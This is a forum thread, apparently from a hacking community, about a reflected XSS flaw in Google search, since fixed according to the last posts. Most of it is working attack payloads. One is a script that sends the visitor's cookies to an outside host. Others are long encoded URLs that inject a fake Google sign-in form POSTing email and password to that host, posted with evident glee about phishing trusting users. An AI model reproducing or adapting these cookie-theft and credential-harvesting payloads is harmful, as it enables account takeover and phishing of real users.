XSS in google

I just found a XSS vulnerability in Google :D

http://www.google.com/search?hl=en&lr=&q=%3Cscript%3Ealert%28123%29%3C%2Fscript%3E+site%3AXSS.by.Uber0n

Amazing work!

• Respect++

Rofl…i didnt knew that would work…xD

Those too : http://www.google.com/search?hl=en&lr=&q=%3Cscript%3Ealert%281%29%3C%2Fscript%3E+inurl%3AXSS&btnG=Search http://www.google.com/search?hl=en&lr=&q=%3Cscript%3Ealert%281%29%3C%2Fscript%3E+filetype%3AXSS&btnG=Search

Uber0n wrote: I just found a XSS vulnerability in Google :D

How can this be a vulnerability in Google? :p

Post it on sla.ckers.org in the "So it begins thread", might be … useful to someone.

mido wrote: How can this be a vulnerability in Google? :p

Cookie Stealing?

With a search of: <script>window.location="http://agesofperil.freehostia.com/?cooks="+document.cookie</script>

You could have: Funny Pics

Serious slacking on googles behalf.

I noticed you used a google defined tag in the search being site:

So I was looking around at it, and relised it does not even need to be a fuction google uses.

As long as you add someword:sometext following the xss string the alert will work.

Shame on google.

@Mido the cookie stealing oppurtunites on this is immense as people automatically trust a link which has google.com at the front. Good times.

Good work though Uberon.

Haha, take a look at this one I just made (fake log in form that works):

http://tinyurl.com/38wcg2

or

http://www.google.com.au/search?hl=en&q=%3Cdiv+style%3D%22color%3A%230099FF%3B+backgr ound%3A%23FFFFFF%3B+position%3A+absolute%3B+top%3A+0%3B+height%3A+100%25%3B+width%3A+ 100%25%3B+left%3A+0%3B%22%3E%3Ctable+width%3D100%25+valign%3Dmiddle+height%3D100%25%3 E%3Ctr%3E%3Ctd%3E%3Ccenter%3E%3Cfont+color%3D%23FF0000%3E%3Cb%3E%3Cbr%3E%3Ccenter%3E% 3Cbr%3E%3Ctable+width%3D%22100%25%22%3E%3Ctr%3E%3Ctd%3E%3Cb%3E%3Ccenter%3EYou+must+be +signed+in+to+view+this+page%21%3Cbr%3E%3C%2Fb%3E%3Cbr%3E%3Cimg+src%3D%22https%3A%2F% 2Fwww.google.com%2Faccounts%2Fgoogle_transparent.gif%22%3E+%3Cb%3EAccount%3C%2Fb%3E%3 Cbr%3E%3Ccenter%3E%3Ctable%3E%3Ctr%3E%3Ctd+align%3Dright%3E%3Cform+action%3D%22http%3 A%2F%2Fagesofperil.freehostia.com%2Findex2.php%22+method%3D%22POST%22%3EEmail%3A+%3Ci nput+type%3Dtext+name%3D%22email%22%3E%3Cbr%3EPassword%3A+%3Cinput+type%3Dpassword+na me%3D%22pass%22%3E%3Cbr%3E%3Cinput+type%3Dsubmit+value%3D%22Sign+in%22%3E%3C%2Fform%3 E%3C%2Ftable%3E%3C%2Ftable%3E%3C%2Ftable%3E%3C%2Fdiv%3E&btnG=Search&meta=

Looks as though anything goes ;).

Scavix wrote: Haha, take a look at this one I just made (fake log in form that works):

http://tinyurl.com/38wcg2

or

http://www.google.com.au/search?hl=en&q=%3Cdiv+style%3D%22color%3A%230099FF%3B+backgr ound%3A%23FFFFFF%3B+position%3A+absolute%3B+top%3A+0%3B+height%3A+100%25%3B+width%3A+ 100%25%3B+left%3A+0%3B%22%3E%3Ctable+width%3D100%25+valign%3Dmiddle+height%3D100%25%3 E%3Ctr%3E%3Ctd%3E%3Ccenter%3E%3Cfont+color%3D%23FF0000%3E%3Cb%3E%3Cbr%3E%3Ccenter%3E% 3Cbr%3E%3Ctable+width%3D%22100%25%22%3E%3Ctr%3E%3Ctd%3E%3Cb%3E%3Ccenter%3EYou+must+be +signed+in+to+view+this+page%21%3Cbr%3E%3C%2Fb%3E%3Cbr%3E%3Cimg+src%3D%22https%3A%2F% 2Fwww.google.com%2Faccounts%2Fgoogle_transparent.gif%22%3E+%3Cb%3EAccount%3C%2Fb%3E%3 Cbr%3E%3Ccenter%3E%3Ctable%3E%3Ctr%3E%3Ctd+align%3Dright%3E%3Cform+action%3D%22http%3 A%2F%2Fagesofperil.freehostia.com%2Findex2.php%22+method%3D%22POST%22%3EEmail%3A+%3Ci nput+type%3Dtext+name%3D%22email%22%3E%3Cbr%3EPassword%3A+%3Cinput+type%3Dpassword+na me%3D%22pass%22%3E%3Cbr%3E%3Cinput+type%3Dsubmit+value%3D%22Sign+in%22%3E%3C%2Fform%3 E%3C%2Ftable%3E%3C%2Ftable%3E%3C%2Ftable%3E%3C%2Fdiv%3E&btnG=Search&meta=

Looks as though anything goes ;).

http://www.google.com.au/search?hl=en&q=%3Cdiv+style%3D%22color%3A%230099FF%3B+background%3A%23FFFFFF%3B+position%3A+absolute%3B+top%3A+0%3B+height%3A+100%25%3B+width%3A+100%25%3B+left%3A+0%3B%22%3E%3Ctable+width%3D100%25+valign%3Dmiddle+height%3D100%25%3E%3Ctr%3E%3Ctd%3E%3Ccenter%3E%3Cfont+color%3D%23FF0000%3E%3Cb%3E%3Cbr%3E%3Ccenter%3E%3Cbr%3E%3Ctable+width%3D%22100%25%22%3E%3Ctr%3E%3Ctd%3E%3Cb%3E%3Ccenter%3EYou+must+be+signed+in+to+view+this+page%21%3Cbr%3E%3C%2Fb%3E%3Cbr%3E%3Cimg+src%3D%22https%3A%2F%2Fwww.google.com%2Faccounts%2Fgoogle_transparent.gif%22%3E+%3Cb%3EAccount%3C%2Fb%3E%3Cbr%3E%3Ccenter%3E%3Ctable%3E%3Ctr%3E%3Ctd+align%3Dright%3E%3Cform+action%3D%22http%3A%2F%2Fagesofperil.freehostia.com%2Findex2.php%22+method%3D%22POST%22%3EEmail%3A+%3Cinput+type%3Dtext+name%3D%22email%22%3E%3Cbr%3EPassword%3A+%3Cinput+type%3Dpassword+name%3D%22pass%22%3E%3Cbr%3E%3Cinput+type%3Dsubmit+value%3D%22Sign+in%22%3E%3C%2Fform%3E%3C%2Ftable%3E%3C%2Ftable%3E%3C%2Ftable%3E%3C%2Fdiv%3E%3Cscript%3Evoid(document.title=%22Please%20Log-In%22);%3C/script%3E&btnG=Search&meta=

I made your one better by making it change the title ;)

system_meltdown wrote: http://www.google.com.au/search?hl=en&q=%3Cdiv+style%3D%22color%3A%230099FF%3B+background%3A%23FFFFFF%3B+position%3A+absolute%3B+top%3A+0%3B+height%3A+100%25%3B+width%3A+100%25%3B+left%3A+0%3B%22%3E%3Ctable+width%3D100%25+valign%3Dmiddle+height%3D100%25%3E%3Ctr%3E%3Ctd%3E%3Ccenter%3E%3Cfont+color%3D%23FF0000%3E%3Cb%3E%3Cbr%3E%3Ccenter%3E%3Cbr%3E%3Ctable+width%3D%22100%25%22%3E%3Ctr%3E%3Ctd%3E%3Cb%3E%3Ccenter%3EYou+must+be+signed+in+to+view+this+page%21%3Cbr%3E%3C%2Fb%3E%3Cbr%3E%3Cimg+src%3D%22https%3A%2F%2Fwww.google.com%2Faccounts%2Fgoogle_transparent.gif%22%3E+%3Cb%3EAccount%3C%2Fb%3E%3Cbr%3E%3Ccenter%3E%3Ctable%3E%3Ctr%3E%3Ctd+align%3Dright%3E%3Cform+action%3D%22http%3A%2F%2Fagesofperil.freehostia.com%2Findex2.php%22+method%3D%22POST%22%3EEmail%3A+%3Cinput+type%3Dtext+name%3D%22email%22%3E%3Cbr%3EPassword%3A+%3Cinput+type%3Dpassword+name%3D%22pass%22%3E%3Cbr%3E%3Cinput+type%3Dsubmit+value%3D%22Sign+in%22%3E%3C%2Fform%3E%3C%2Ftable%3E%3C%2Ftable%3E%3C%2Ftable%3E%3C%2Fdiv%3E%3Cscript%3Evoid(document.title=%22Please%20Log-In%22);%3C/script%3E&btnG=Search&meta=

I made your one better by making it change the title ;)

That's sexy. :D

Is it just me or does this not work anymore…:ninja:

Yeah, fixed by google.

Wow, they caught on pretty quick.